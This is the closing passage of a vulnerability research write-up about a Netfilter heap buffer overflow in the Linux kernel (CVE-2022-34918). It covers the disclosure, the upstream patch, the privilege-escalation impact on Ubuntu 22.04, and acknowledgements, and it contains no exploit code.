This vulnerability has been reported to the Linux security team and CVE-2022-34918 has been assigned. They proposed a patch that I tested and reviewed, and it was merged into the upstream tree in commit 7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6.

Conclusion

To sum up, I found a heap buffer overflow within the Netfilter subsystem of the Linux kernel. This vulnerability could be exploited to escalate privileges on Ubuntu 22.04. The source code of the exploit is available on our GitHub.

I would like to thank RandoriSec for the opportunity they gave me to perform vulnerability research on the Linux kernel during my internship, and my research team for their advice.